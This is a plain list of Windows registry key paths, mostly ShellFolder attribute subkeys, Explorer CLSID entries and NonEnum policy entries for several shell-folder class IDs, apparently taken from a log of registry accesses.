HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
HKEY_CLASSES_ROOT\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{4336A54D-038B-4685-AB02-99BB52D3FB8B}
HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_CLASSES_ROOT\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_CLASSES_ROOT\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{89D83576-6BD1-4C86-9454-BEB04E94C819}
HKEY_CLASSES_ROOT\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
HKEY_CLASSES_ROOT\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\Attributes
HKEY_CURRENT_USER\Software\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{9343812E-1C37-4A49-A12E-4B2D810D956B}
HKEY_CLASSES_ROOT\CLSID\{98D99750-0B8A-4C59-9151-589053683D73}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{98D99750-0B8A-4C59-9151-589053683D73}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{98D99750-0B8A-4C59-9151-589053683D73}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{98D99750-0B8A-4C59-9151-589053683D73}
HKEY_CLASSES_ROOT\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
HKEY_CLASSES_ROOT\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\Attributes
